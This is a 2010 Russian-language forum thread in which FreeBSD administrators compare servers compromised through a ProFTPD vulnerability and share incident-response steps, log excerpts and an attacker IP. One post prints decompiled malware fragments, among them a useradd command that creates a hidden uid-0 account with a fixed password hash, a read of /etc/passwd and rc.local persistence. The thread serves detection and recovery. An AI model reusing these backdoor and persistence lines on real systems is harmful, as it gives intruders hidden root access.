Взломан сервер freebsd 7.0 (jail)

xone · Непрочитанное сообщение **xone** » 2010-12-10 19:17:52

Взломан сервер

7.0-RELEASE FreeBSD 7.0-RELEASE #1: Mon Mar 31 09:47:29 MSD 2008     root@---.---.ru:/usr/obj/usr/src/sys/k01  i386

проявлялось это так:
Было замечено, что веб-сервер apache22 перестал отвечать на запросы.
Просмотр ps показал огромное число процессов от рута со странным именем obkgchvpjhwjuad.
Процесс был запущен в одной из клеток. Процессы заставляли слушать 50000-какой-то порт, к которому коннектился ip 184.171.166.162.
Передавались ли какие-то данные и была-ли какая-либо активность - сказать не могу, т.к. с перепугу все процессы убил и jail перезапустил.
Осмотр показал наличие еще 3 таких-же файлов в папке клетки/etc и файл rc.local следующего содержания.

Код: Выделить всё

/root/obkgchvpjhwjuad
exit 0

В папке /root ничего необычного нет.
Время создания этих странных с файлов совпадает с диким числом попыток залогиниться по ftp (сервер proftpd 1.3.1 с авторизацией в mysql настроен по статье с этого сайта). При этом в xferlog ничего нет.
Сами файлы явно не текстовые. Они сохранились.

Еще насторожило: в логах apache приблизительно во время создания файлов в /etc:

Код: Выделить всё

69.41.167.98 - - [10/Dec/2010:04:21:04 +0000] "GET /doesnotexist.hax HTTP/1.1" 404 214 "-" "crimscan/1.2"
209.172.55.251 - - [10/Dec/2010:04:22:05 +0000] "GET /doesnotexist.hax HTTP/1.1" 404 214 "-" "crimscan/1.2"

И в /var/log/messages множественные

Код: Выделить всё

Dec 10 04:21:17 hosting proftpd[73920]: --.--.net (69.41.167.98[69.41.167.98]) - ProFTPD terminating (signal 11)
Dec 10 04:22:06 hosting proftpd[74068]: --.--.net (209.172.55.251[209.172.55.251]) - ProFTPD terminating (signal 11)

IP адреса совпадают. На фаере их заблочил. Клетку пока вырубил.
Интуиция подсказывает что дыра в proftpd, но никакой уверенности нет.
Тысячу раз проверил все конфиги в основной системе и в клетках но никакого ансекьюра не обнаружил.
Подскажите куда копать и где искать дыру, ущерба вроде нет, но жить так нельзя.

Хостинг HostFood.ru · **Хостинг HostFood.ru**

Тарифы на хостинг в России, от 12 рублей: https://www.host-food.ru/tariffs/hosting/
Тарифы на виртуальные сервера (VPS/VDS/KVM) в РФ, от 189 руб.: https://www.host-food.ru/tariffs/virtualny-server-vps/
Выделенные сервера, Россия, Москва, от 2000 рублей (HP Proliant G5, Intel Xeon E5430 (2.66GHz, Quad-Core, 12Mb), 8Gb RAM, 2x300Gb SAS HDD, P400i, 512Mb, BBU):
https://www.host-food.ru/tariffs/vydelennyi-server-ds/
Недорогие домены в популярных зонах: https://www.host-food.ru/domains/

Alex Keda

версия proftpd

Gloft · Непрочитанное сообщение **Gloft** » 2010-12-10 20:18:20

Посмотри все логи апача на нештатные запрсы (хотя полностью доверять лоугам в клетке не стоит). Хотя не только апача, смотри все логи.
Примерно по имеющимся логам определить время когда был получен доступ к ОС.
Проверь какие файлы были изменены за последнее время.
Если клетка делалась по шаблону, то сравни системный программы из другой клетки/шаблона (md5 или просто по размеру).
Раз стоял апач значит есть сайт, в случае если используется какая-либа цмс то лезим в гугл смотрим последнюю версию и причины обновления.
Можешь поискать эксплойты под те версии сервисов которые стоят у тебя.
Если есть архив сайта. сравниваем, то что в архиве и то что лежит в клетке (тут ориентироваться надо на время Ч которое ты должен был примерно определить ранее).
В целом в инете есть инструкции описывающие, что делать в таких случаях.

В зависимости от ресурса/сервисов которые были запущены в клетке принимаешь решение как быстро востанавливать.
Можно настроить новую клетку с обновленным ПО, после чего потихоньку разбираться что же случилось в старой.
ЗЫ незабудь полностью сменить пароли (на каждый сервис свой пользователь со своим паролем).

Что я бы сделал:
1. с начало надо было отключить клетку от сети
2. проверить cron (/etc/crontab /var/cron/tabs) и atq на наличие "забавных" заданий
3. скопируйте все ваши данные на другой носитель
4. поищите в инете имена всех "странных" файлов поскольку это могут быть обломки оставленными каким нибудь руткитом с последующими выводами
5. попробуйте убить странные демоны, но осторожно
6. обновите ПО и систему(или переустановите в тяжелых случаях) со сменой паролей

Что периодично можно делать.
1. периодически заглядывайте в top следите за загрузкой системы
2. читайте логи и сообщения с ОС
3. смотрите что в /tmp и /var/tmp и не забывайте чистить + использовать nosuid

xone · Непрочитанное сообщение **xone** » 2010-12-10 22:00:25

Спасибо за советы, будем работать.

LMik · Непрочитанное сообщение **LMik** » 2010-12-10 22:19:09

Alex Keda писал(а):версия proftpd

Ведь не зря же Лис спросил.

http://www.securitylab.ru/vulnerability/399159.php совсем недавняя уязвимость в proftpd.

xone · Непрочитанное сообщение **xone** » 2010-12-10 23:33:25

proftpd-1.3.2_1.
Однако - в логах proftpd не видно что писали в директорию /etc и вообще никаких подозрительных записей, разве что уязвимость помогает это обойти.
В общем proftpd.log пишутся только записи от mod_sql. Время появления огромного количества записей mod_sql в proftpd log совпадает со временем поялвения подозрительных файлов, а так лог неинформативен, эти записи выглядят также, как и при обычном логине пользователя.
Насчет mod_site_misc - не помню есть он или нет:(

xone · Непрочитанное сообщение **xone** » 2010-12-11 0:00:07

Прошерстил весь диск на наличие всяческой падали и логи системы и апача - больше ничего необычного не нашел.
Забэкапил машину, убил всю падаль, обновил proftpd, настроил логи, буду ждать.

+ freebsd 7.0 -> 8.1
+ что можно глянуть тут http://www.lissyara.su/articles/freebsd ... mored_bsd/ (+ 3.1))

avgreen · Непрочитанное сообщение **avgreen** » 2010-12-12 2:26:03

xone писал(а):Взломан сервер
Код: Выделить всё
7.0-RELEASE FreeBSD 7.0-RELEASE #1: Mon Mar 31 09:47:29 MSD 2008     root@---.---.ru:/usr/obj/usr/src/sys/k01  i386
проявлялось это так:

Та-же фигня

только забеспокоился по другому поводу. У меня к сожалению сломали не jail а основной сервак
Процессы открыли кучу соединений и сервак тупо упал из-за "Too many open files in system"
Поэтому кто и куда конектился и даже то что это был именно взлом я даже не понял. На на третий раз удалось поймать момент когда количество открытых файлов еще не достигло критического порога и выловить в чем дело. Поскольку количество открытых портов у меня ограничено 25, 53, 443 .... и 21 то первое что сделал - поменял рутовый пароль и пароли админов (те что в группе wheel) и закрыл 21-й порт, хотя еще не знал об уязвимости ProFTPD. Как оказалось не зря закрыл!

IP адреса совпадают. На фаере их заблочил. Клетку пока вырубил.

А смысл!? Меня ломали с разных адресов. 62.19.54.97, ip-97-74-112-183.ip.secureserver.net, k162-201.OLOWEK.ds.uni.wroc.pl:156.17.162.201, ip-72-167-164-21.ip.secureserver.net, ip-184-168-81-89.ip.secureserver.net
Я так думаю что это такие-же бедолаги как и мы с тобой, т.е. уже сломанные адреса с которых атаковались другие компы. Я попробовал - на всех на них отвечает ProFTPD и на всех "необновленный", т.е. до версии 1.3.3.с

Код: Выделить всё

mailserver# ftp ip-184-168-81-89.ip.secureserver.net
Connected to ip-184-168-81-89.ip.secureserver.net.
220 ProFTPD 1.3.3 Server (ProFTPD) [184.168.81.89]
Name (ip-184-168-81-89.ip.secureserver.net:avgreen): ^C

mailserver# ftp ip-72-167-164-21.ip.secureserver.net
Connected to ip-72-167-164-21.ip.secureserver.net.
220 ProFTPD 1.3.3 Server (ProFTPD) [72.167.164.21]
Name (ip-72-167-164-21.ip.secureserver.net:avgreen): ^C

mailserver# ftp  k162-201.OLOWEK.ds.uni.wroc.pl:156.17.162.201
Connected to k162-201.OLOWEK.ds.uni.wroc.pl.
220 ProFTPD 1.3.3a Server (Debian) [::ffff:156.17.162.201]
331 Password required for anonymous
530 Login incorrect.
ftp: Login failed.
ftp: Can't connect or login to host `k162-201.OLOWEK.ds.uni.wroc.pl'
221 Goodbye.
mailserver# ftp ip-97-74-112-183.ip.secureserver.net
Connected to ip-97-74-112-183.ip.secureserver.net.
220 ProFTPD 1.3.3 Server (ProFTPD) [97.74.112.183]
Name (ip-97-74-112-183.ip.secureserver.net:avgreen): ^C

Кстати эти 15 тыс соединений от которых и упал мой сервак IMHO были попытки атаковать другие сервера. Но разработчики руткита явно пожадничали

Интуиция подсказывает что дыра в proftpd, но никакой уверенности нет.

"Предчувствия его не обманули!" (с) мультик

Кстати, знаешь как я нашел эту тему в поисковике? По адресу 184.171.166.162 У меня тоже туда конектился процесс. Только по моему соединение было не "оттуда" а "туда"! Так что IMHO ахтунги засели именно там. Но вот достать их нет никакой возможности

Еще замечание - хотя уязвимость обнаружена еще в ноябре (опубликована точнее) "жопа" началась именно 10-го. У меня это случилось 10-го в 4 часа ночи. До этого в логах подобных записей нету

avgreen · Непрочитанное сообщение **avgreen** » 2010-12-12 2:36:33

xone писал(а):proftpd-1.3.2_1.
Однако - в логах proftpd не видно что писали в директорию /etc и вообще никаких подозрительных записей, разве что уязвимость помогает это обойти.

А и не должно быть видно! ProFTPD тупо падает из-за переполнения буфера и в этот момент выполняется код, внедренный атакующей системой. Это не штатная ситуация и в логах естественно ничего кроме ProFTPD terminating (signal 11) нету

Да юзайте же Pure-FTPd чем этот дырявый proftpd. Что вы на нем помешались то? Сколько раз он был скомпрометирован...

bobka-mopkobka

А я смотрю это свежачёк))) прочитал ваши посты и сопоставил со своими исследованими логов FreeBsd и циски))
Короче так)))

сначало в логах и еррорах Апатча появляется
62.149.226.66 - - [12/Dec/2010:01:42:35 +0000] "GET /doesnotexist.hax HTTP/1.1" 404 214 "-" "crimscan/1.2"
184.168.117.234 - - [12/Dec/2010:01:53:40 +0000] "GET /doesnotexist.hax HTTP/1.1" 404 214 "-" "crimscan/1.2"
[Sun Dec 12 01:42:35 2010] [error] [client 62.149.226.66] File does not exist: /usr/home/illusion/public_html/doesnotexist.hax
[Sun Dec 12 01:53:40 2010] [error] [client 184.168.117.234] File does not exist: /usr/home/illusion/public_html/doesnotexist.hax

затем через несколько сикунд в ETC создаются эти странные файлы:
-rwxrwxrwx 1 root wheel 23267 Dec 12 01:54 hyfrsywhowagmhg
-rwxrwxrwx 1 root wheel 23267 Dec 12 01:54 oaayusejjghapdr
-rwxrwxrwx 1 root wheel 23267 Dec 12 01:43 odckuxcuudcsfng
-rwxrwxrwx 1 root wheel 23267 Dec 12 01:43 uuvsnjutntkdjul

Потом валится proftp (я его кстати тоже впервую очередь завалил чтобы больше он не валился:) ) со словами:

Dec 12 01:42:38 spider proftpd[98750]: spider (host66-226-149-62.serverdedicati.aruba.it[::ffff:62.149.226.66]) - ProFTPD terminating (signal 11)
Dec 12 01:42:42 spider proftpd[98751]: spider (host66-226-149-62.serverdedicati.aruba.it[::ffff:62.149.226.66]) - ProFTPD terminating (signal 11)
Dec 12 01:42:45 spider proftpd[98752]: spider (host66-226-149-62.serverdedicati.aruba.it[::ffff:62.149.226.66]) - ProFTPD terminating (signal 11)
Dec 12 01:42:48 spider proftpd[98753]: spider (host66-226-149-62.serverdedicati.aruba.it[::ffff:62.149.226.66]) - ProFTPD terminating (signal 11)
Dec 12 01:42:51 spider proftpd[98755]: spider (host66-226-149-62.serverdedicati.aruba.it[::ffff:62.149.226.66]) - ProFTPD terminating (signal 11)
Dec 12 01:43:13 spider proftpd[98756]: spider (host66-226-149-62.serverdedicati.aruba.it[::ffff:62.149.226.66]) - ProFTPD terminating (signal 11)
Dec 12 01:43:16 spider proftpd[98757]: spider (host66-226-149-62.serverdedicati.aruba.it[::ffff:62.149.226.66]) - ProFTPD terminating (signal 11)
Dec 12 01:43:19 spider proftpd[98758]: spider (host66-226-149-62.serverdedicati.aruba.it[::ffff:62.149.226.66]) - ProFTPD terminating (signal 11)
Dec 12 01:43:22 spider proftpd[98759]: spider (host66-226-149-62.serverdedicati.aruba.it[::ffff:62.149.226.66]) - ProFTPD terminating (signal 11)
Dec 12 01:43:22 spider proftpd[98759]: spider (host66-226-149-62.serverdedicati.aruba.it[::ffff:62.149.226.66]) - ProFTPD terminating (signal 11)
Dec 12 01:43:26 spider proftpd[98760]: spider (host66-226-149-62.serverdedicati.aruba.it[::ffff:62.149.226.66]) - ProFTPD terminating (signal 11)
Dec 12 01:43:29 spider proftpd[98761]: spider (host66-226-149-62.serverdedicati.aruba.it[::ffff:62.149.226.66]) - ProFTPD terminating (signal 11)
Dec 12 01:43:32 spider proftpd[98762]: spider (host66-226-149-62.serverdedicati.aruba.it[::ffff:62.149.226.66]) - ProFTPD terminating (signal 11)
Dec 12 01:43:36 spider proftpd[98763]: spider (host66-226-149-62.serverdedicati.aruba.it[::ffff:62.149.226.66]) - ProFTPD terminating (signal 11)
Dec 12 01:43:45 spider proftpd[98792]: spider (host66-226-149-62.serverdedicati.aruba.it[::ffff:62.149.226.66]) - ProFTPD terminating (signal 11)
Dec 12 01:43:49 spider proftpd[98817]: spider (host66-226-149-62.serverdedicati.aruba.it[::ffff:62.149.226.66]) - ProFTPD terminating (signal 11)
Dec 12 01:43:52 spider proftpd[98818]: spider (host66-226-149-62.serverdedicati.aruba.it[::ffff:62.149.226.66]) - ProFTPD terminating (signal 11)
Dec 12 01:43:55 spider proftpd[98819]: spider (host66-226-149-62.serverdedicati.aruba.it[::ffff:62.149.226.66]) - ProFTPD terminating (signal 11)
Dec 12 01:43:58 spider proftpd[98820]: spider (host66-226-149-62.serverdedicati.aruba.it[::ffff:62.149.226.66]) - ProFTPD terminating (signal 11)
Dec 12 01:44:05 spider proftpd[98822]: spider (host66-226-149-62.serverdedicati.aruba.it[::ffff:62.149.226.66]) - ProFTPD terminating (signal 11)
Dec 12 01:44:08 spider proftpd[98954]: spider (host66-226-149-62.serverdedicati.aruba.it[::ffff:62.149.226.66]) - ProFTPD terminating (signal 11)
Dec 12 01:44:15 spider proftpd[98955]: spider (host66-226-149-62.serverdedicati.aruba.it[::ffff:62.149.226.66]) - ProFTPD terminating (signal 11)
Dec 12 01:44:18 spider proftpd[98956]: spider (host66-226-149-62.serverdedicati.aruba.it[::ffff:62.149.226.66]) - ProFTPD terminating (signal 11)
Dec 12 01:44:21 spider proftpd[98957]: spider (host66-226-149-62.serverdedicati.aruba.it[::ffff:62.149.226.66]) - ProFTPD terminating (signal 11)
Dec 12 01:44:31 spider proftpd[98958]: spider (host66-226-149-62.serverdedicati.aruba.it[::ffff:62.149.226.66]) - ProFTPD terminating (signal 11)
Dec 12 01:44:34 spider proftpd[98959]: spider (host66-226-149-62.serverdedicati.aruba.it[::ffff:62.149.226.66]) - ProFTPD terminating (signal 11)
Dec 12 01:44:37 spider proftpd[98960]: spider (host66-226-149-62.serverdedicati.aruba.it[::ffff:62.149.226.66]) - ProFTPD terminating (signal 11)
Dec 12 01:44:44 spider proftpd[98961]: spider (host66-226-149-62.serverdedicati.aruba.it[::ffff:62.149.226.66]) - ProFTPD terminating (signal 11)
Dec 12 01:44:47 spider proftpd[98962]: spider (host66-226-149-62.serverdedicati.aruba.it[::ffff:62.149.226.66]) - ProFTPD terminating (signal 11)
Dec 12 01:44:50 spider proftpd[98963]: spider (host66-226-149-62.serverdedicati.aruba.it[::ffff:62.149.226.66]) - ProFTPD terminating (signal 11)
Dec 12 01:44:57 spider proftpd[98964]: spider (host66-226-149-62.serverdedicati.aruba.it[::ffff:62.149.226.66]) - ProFTPD terminating (signal 11)
Dec 12 01:53:41 spider proftpd[99164]: spider (ip-184-168-117-234.ip.secureserver.net[::ffff:184.168.117.234]) - ProFTPD terminating (signal 11)
Dec 12 01:53:45 spider proftpd[99165]: spider (ip-184-168-117-234.ip.secureserver.net[::ffff:184.168.117.234]) - ProFTPD terminating (signal 11)
Dec 12 01:53:51 spider proftpd[99166]: spider (ip-184-168-117-234.ip.secureserver.net[::ffff:184.168.117.234]) - ProFTPD terminating (signal 11)
Dec 12 01:53:55 spider proftpd[99167]: spider (ip-184-168-117-234.ip.secureserver.net[::ffff:184.168.117.234]) - ProFTPD terminating (signal 11)
Dec 12 01:53:58 spider proftpd[99168]: spider (ip-184-168-117-234.ip.secureserver.net[::ffff:184.168.117.234]) - ProFTPD terminating (signal 11)
Dec 12 01:54:01 spider proftpd[99169]: spider (ip-184-168-117-234.ip.secureserver.net[::ffff:184.168.117.234]) - ProFTPD terminating (signal 11)
Dec 12 01:54:08 spider proftpd[99223]: spider (ip-184-168-117-234.ip.secureserver.net[::ffff:184.168.117.234]) - ProFTPD terminating (signal 11)
Dec 12 01:54:11 spider proftpd[99289]: spider (ip-184-168-117-234.ip.secureserver.net[::ffff:184.168.117.234]) - ProFTPD terminating (signal 11)
Dec 12 01:54:15 spider proftpd[99290]: spider (ip-184-168-117-234.ip.secureserver.net[::ffff:184.168.117.234]) - ProFTPD terminating (signal 11)
Dec 12 01:54:15 spider proftpd[99290]: spider (ip-184-168-117-234.ip.secureserver.net[::ffff:184.168.117.234]) - ProFTPD terminating (signal 11)
Dec 12 01:54:21 spider proftpd[99291]: spider (ip-184-168-117-234.ip.secureserver.net[::ffff:184.168.117.234]) - ProFTPD terminating (signal 11)
Dec 12 01:54:31 spider proftpd[99292]: spider (ip-184-168-117-234.ip.secureserver.net[::ffff:184.168.117.234]) - ProFTPD terminating (signal 11)
Dec 12 01:54:41 spider proftpd[99294]: spider (ip-184-168-117-234.ip.secureserver.net[::ffff:184.168.117.234]) - ProFTPD terminating (signal 11)
Dec 12 01:54:44 spider proftpd[99295]: spider (ip-184-168-117-234.ip.secureserver.net[::ffff:184.168.117.234]) - ProFTPD terminating (signal 11)
Dec 12 01:55:04 spider proftpd[99324]: spider (ip-184-168-117-234.ip.secureserver.net[::ffff:184.168.117.234]) - ProFTPD terminating (signal 11)
Dec 12 01:55:08 spider proftpd[99383]: spider (ip-184-168-117-234.ip.secureserver.net[::ffff:184.168.117.234]) - ProFTPD terminating (signal 11)
Dec 12 01:55:14 spider proftpd[99384]: spider (ip-184-168-117-234.ip.secureserver.net[::ffff:184.168.117.234]) - ProFTPD terminating (signal 11)
Dec 12 01:55:18 spider proftpd[99385]: spider (ip-184-168-117-234.ip.secureserver.net[::ffff:184.168.117.234]) - ProFTPD terminating (signal 11)
Dec 12 01:55:24 spider proftpd[99386]: spider (ip-184-168-117-234.ip.secureserver.net[::ffff:184.168.117.234]) - ProFTPD terminating (signal 11)
Dec 12 01:55:28 spider proftpd[99387]: spider (ip-184-168-117-234.ip.secureserver.net[::ffff:184.168.117.234]) - ProFTPD terminating (signal 11)
Dec 12 01:55:34 spider proftpd[99388]: spider (ip-184-168-117-234.ip.secureserver.net[::ffff:184.168.117.234]) - ProFTPD terminating (signal 11)
Dec 12 01:55:38 spider proftpd[99389]: spider (ip-184-168-117-234.ip.secureserver.net[::ffff:184.168.117.234]) - ProFTPD terminating (signal 11)
Dec 12 01:55:44 spider proftpd[99391]: spider (ip-184-168-117-234.ip.secureserver.net[::ffff:184.168.117.234]) - ProFTPD terminating (signal 11)
Dec 12 01:55:48 spider proftpd[99392]: spider (ip-184-168-117-234.ip.secureserver.net[::ffff:184.168.117.234]) - ProFTPD terminating (signal 11)
Dec 12 01:55:54 spider proftpd[99393]: spider (ip-184-168-117-234.ip.secureserver.net[::ffff:184.168.117.234]) - ProFTPD terminating (signal 11)
Dec 12 01:55:58 spider proftpd[99394]: spider (ip-184-168-117-234.ip.secureserver.net[::ffff:184.168.117.234]) - ProFTPD terminating (signal 11)
Dec 12 01:56:04 spider proftpd[99395]: spider (ip-184-168-117-234.ip.secureserver.net[::ffff:184.168.117.234]) - ProFTPD terminating (signal 11)
Dec 12 01:56:08 spider proftpd[99396]: spider (ip-184-168-117-234.ip.secureserver.net[::ffff:184.168.117.234]) - ProFTPD terminating (signal 11)
Dec 12 01:56:14 spider proftpd[99397]: spider (ip-184-168-117-234.ip.secureserver.net[::ffff:184.168.117.234]) - ProFTPD terminating (signal 11)
Dec 12 01:56:18 spider proftpd[99398]: spider (ip-184-168-117-234.ip.secureserver.net[::ffff:184.168.117.234]) - ProFTPD terminating (signal 11)
Dec 12 01:56:24 spider proftpd[99399]: spider (ip-184-168-117-234.ip.secureserver.net[::ffff:184.168.117.234]) - ProFTPD terminating (signal 11)
Dec 12 02:27:54 spider proftpd[713]: spider - ProFTPD killed (signal 15)
Dec 12 02:27:54 spider proftpd[713]: spider - ProFTPD 1.3.2 standalone mode SHUTDOWN

потом значит происходит следущее! эти файлики слушают 21 порт(вместо proFTP)
sockstat | grep 21
root oaayusejjg 99348 0 tcp4 192.168.111.100:21 184.168.117.234:48814
root hyfrsywhow 99322 0 tcp4 192.168.111.100:21 184.168.117.234:36683
root uuvsnjutnt 98816 0 tcp4 192.168.111.100:21 62.149.226.66:37237
root odckuxcuud 98790 0 tcp4 192.168.111.100:21 62.149.226.66:58649

и по очереди коннектят на хост 184.171.166.162:40808
root hyfrsywhow 99322 2 tcp4 192.168.111.100:61389 184.171.166.162:40808

*Dec 12 12:00:29.746: %SEC-6-IPACCESSLOGP: list Vlan192_In denied tcp 192.168.111.100(49788) -> 184.171.166.162(40808), 1 packet
*Dec 12 12:00:32.130: %SEC-6-IPACCESSLOGP: list Vlan192_In denied tcp 192.168.111.100(58016) -> 184.171.166.162(40808), 1 packet
*Dec 12 12:00:34.746: %SEC-6-IPACCESSLOGP: list Vlan192_In denied tcp 192.168.111.100(60996) -> 184.171.166.162(40808), 1 packet
*Dec 12 12:00:37.130: %SEC-6-IPACCESSLOGP: list Vlan192_In denied tcp 192.168.111.100(60749) -> 184.171.166.162(40808), 1 packet
*Dec 12 12:00:39.746: %SEC-6-IPACCESSLOGP: list Vlan192_In denied tcp 192.168.111.100(56784) -> 184.171.166.162(40808), 1 packet
*Dec 12 12:00:42.130: %SEC-6-IPACCESSLOGP: list Vlan192_In denied tcp 192.168.111.100(57868) -> 184.171.166.162(40808), 1 packet
*Dec 12 12:00:44.746: %SEC-6-IPACCESSLOGP: list Vlan192_In denied tcp 192.168.111.100(51558) -> 184.171.166.162(40808), 1 packet
*Dec 12 12:00:47.130: %SEC-6-IPACCESSLOGP: list Vlan192_In denied tcp 192.168.111.100(62296) -> 184.171.166.162(40808), 1 packet

Кстати можно попробовать самим телнеткнуться туда и там действительно что то отвечает(

В обще вот так!!! перекрыл вчера на циске все исходящие соединения а после того как всё повторилось сегодня вырубил proftp! сталось вырубить Апатч и вырубить серв)))

FreeBSD spider.liannet.ru 7.2-RELEASE FreeBSD 7.2-RELEASE #0: Tue Dec 29 16:40:15 UTC 2009 sid@spider.liannet.ru:/usr/obj/usr/src/sys/SPIDER i386
ProFTP 1.3.2
apache-2.2.14_5

bobka-mopkobka

Ещё разик подумал взвесил! короче патчить надо старинный proftp(или юзать sftp)! видимо работают боты, а в апатче следы это всего лишь тест на дырявость апатча, а ломают через Proftp... полюбому))

avgreen · Непрочитанное сообщение **avgreen** » 2010-12-12 18:36:30

bobka-mopkobka писал(а): [skip]

В обще вот так!!! перекрыл вчера на циске все исходящие соединения а после того как всё повторилось сегодня вырубил proftp! сталось вырубить Апатч и вырубить серв)))

FreeBSD spider.liannet.ru 7.2-RELEASE FreeBSD 7.2-RELEASE #0: Tue Dec 29 16:40:15 UTC 2009 sid@spider.liannet.ru:/usr/obj/usr/src/sys/SPIDER i386
ProFTP 1.3.2
apache-2.2.14_5

Ты что - мазохист?

Сказано-же несколькими постами выше - обновляй ProFTPD до версии 1.3.3c и закрывай НАХ эту дырку! Ну или ставь другой Ftp сервер как советует Raven2000

warlock · Непрочитанное сообщение **warlock** » 2010-12-12 20:31:04

Вижу не меня только коснулась проблема старого ProFTP.
Сегодня также словил эту дрянь. Но так как в sysctl.conf у меня стоит
kern.maxfiles=65536 то сервачок крепился изо всех сил и не падал. Только эти паразиты:
/root/obkgchvpjhwjuad
и им подобные.
запущенные от рута сожрали практически все ресурсы.
Обновил до 1.3.3с и вроде больше ни одной лажи с ProFTP не было до сих пор с утра.
Кстати это у меня только порт ports/ftp/proftpd был кривоватый, что пришлось руками пару опций править, чтобы собрался по-человечески ???

avgreen · Непрочитанное сообщение **avgreen** » 2010-12-12 23:37:31

warlock писал(а): Кстати это у меня только порт ports/ftp/proftpd был кривоватый, что пришлось руками пару опций править, чтобы собрался по-человечески ???

У меня нормально собрался. Но у всех набор портов разный - так что не факт!

avgreen · Непрочитанное сообщение **avgreen** » 2010-12-12 23:44:16

Если это http://www.xakep.ru/post/54145/default.asp правда то придется таки валить с ProFTPD. Что-то очень уж много у него приколов/проколов

bobka-mopkobka

avgreen писал(а):Если это http://www.xakep.ru/post/54145/default.asp правда то придется таки валить с ProFTPD. Что-то очень уж много у него приколов/проколов

Да смысл то такой что чисто теоретически из каждого красивого ФТП сервера типа proFTP можно получить доступ к РУТУ))) так что если валить так это попросту пересматривать политику безопасности... открывать на фаерволе не всем или юзать sftp... Я вот думаю что для фтп сервера доступного из вне сделаю отдельный виртуальный сервак и пусть его ломают... покрайне мере остальную инфу не покарёжат)))

schizoid

плять...и меню ломанули также

при чем в тоже время. в пятницу...

schizoid

еще появилась папка /updates

Код: Выделить всё

-rwxr-xr-x  1 root  wheel     83  8 дек 19:49 100.sh
-rwxr-xr-x  1 root  wheel     84  8 дек 19:49 200.sh
-rwxr-xr-x  1 root  wheel     84  8 дек 19:49 255.sh
-rwxr-xr-x  1 root  wheel     97  9 дек 08:07 all.sh
-rwxr-xr-x  1 root  wheel  17897  8 дек 19:49 break
-rwxr-xr-x  1 root  wheel  13706  8 дек 19:49 ftpscan
-rwxr-xr-x  1 root  wheel     77  8 дек 19:49 run

проверьте и у себя

schizoid

может выложить куда файлики эти, что б программеры глянули? может где еще кроме /etc эта срань сидит?
я просто в коде не шарю...

hizel · Непрочитанное сообщение **hizel** » 2010-12-13 11:22:22

я не пойму, что ты хочешь нашарить, то что ты в Area выложил точно зловредное

Код: Выделить всё

IRC_CONNECT

особенно глядя на это

кой смысл? хочешь врагов наказать и отшлепать ?

bobka-mopkobka

schizoid писал(а):может выложить куда файлики эти, что б программеры глянули? может где еще кроме /etc эта срань сидит?
я просто в коде не шарю...

Выложи себе на ПроФТП)))))))))))))

nikulich · Непрочитанное сообщение **nikulich** » 2010-12-15 9:34:41

наткнулся на те же грабли, файлик сохранил оказалось что это писанная программа и закоденная elf-фом самые интересные строки кода:
1.

Код: Выделить всё

*esp = "cat /etc/passwd | grep carnivores | wc -l";
        *(ebp + -1375) = *"/etc/b.chk";
        *(ebp + -1371) = *"/b.chk";

2.

Код: Выделить всё

*esp = "/usr/sbin/useradd --password Azlo5qcAzUDYQ carnivores --create-home --home-dir /etc/carnivores --uid 0 --gid 0 --non-unique";

3.

Код: Выделить всё

eax = ecx >> "c/ld-elf.so.1";
 eax = *(ebp + -8568) * "ibexec/ld-elf.so.1";

4.

Код: Выделить всё

    shellexec();
    Vffffde64 = "CentOS";
    *esp = *(ebp - 0x48);
    if(L08048DAC() != 0) {
        Vffffde68 = 6;
        Vffffde64 = "centos";
        *esp = dist;
        L08048E8C();
    } else {
        Vffffde64 = "Debian";
        *esp = *(ebp - 0x48);
        if(L08048DAC() != 0) {
            Vffffde68 = 6;
            Vffffde64 = "debian";
            *esp = dist;
            L08048E8C();
        } else {
            Vffffde64 = "Fedora";
            *esp = *(ebp - 0x48);
            if(L08048DAC() != 0) {
                Vffffde68 = 6;
                Vffffde64 = "fedora";
                *esp = dist;
                L08048E8C();
            } else {
                Vffffde68 = 6;
                Vffffde64 = "nodist";
                *esp = dist;
                L08048E8C();

5.

Код: Выделить всё

  if(*(ebp - 0x44) != 0) {
        Vffffde68 = 0x13;
        Vffffde64 = "/etc/rc.d/rc.local";
        *esp = ebp + -852;
        L08048E8C();
        *esp = *(ebp - 0x44);
        L08048EAC();
    } else {
        Vffffde68 = 0xe;
        Vffffde64 = "/etc/rc.local";

есть ещё пара моментов ставится какой то бот что за бот пока не понял и что именно отдельно компилит скрипт этот.
в общем если у когото пропал контроль над сервером то собственно пасс от ващего сервака скорее всего будет Azlo5qcAzUDYQ и имя юзера не рут а carnivores

если у кого то есть ещё что то по этой теме плиз отпишитесь , хотелось бы получить то файло которое у вас появилось в указанных папках юзера carnivores

forum.lissyara.su

Взломан сервер freebsd 7.0 (jail)

Взломан сервер freebsd 7.0 (jail)

Услуги хостинговой компании Host-Food.ru

Re: Взломан сервер freebsd 7.0 (jail)

Re: Взломан сервер freebsd 7.0 (jail)

Re: Взломан сервер freebsd 7.0 (jail)

Re: Взломан сервер freebsd 7.0 (jail)

Re: Взломан сервер freebsd 7.0 (jail)

Re: Взломан сервер freebsd 7.0 (jail)

Re: Взломан сервер freebsd 7.0 (jail)

Re: Взломан сервер freebsd 7.0 (jail)

Re: Взломан сервер freebsd 7.0 (jail)

Re: Взломан сервер freebsd 7.0 (jail)

Re: Взломан сервер freebsd 7.0 (jail)

Re: Взломан сервер freebsd 7.0 (jail)

Re: Взломан сервер freebsd 7.0 (jail)

Re: Взломан сервер freebsd 7.0 (jail)

Re: Взломан сервер freebsd 7.0 (jail)

Re: Взломан сервер freebsd 7.0 (jail)

Re: Взломан сервер freebsd 7.0 (jail)

Re: Взломан сервер freebsd 7.0 (jail)

Re: Взломан сервер freebsd 7.0 (jail)

Re: Взломан сервер freebsd 7.0 (jail)

Re: Взломан сервер freebsd 7.0 (jail)

Re: Взломан сервер freebsd 7.0 (jail)

Re: Взломан сервер freebsd 7.0 (jail)

Re: Взломан сервер freebsd 7.0 (jail)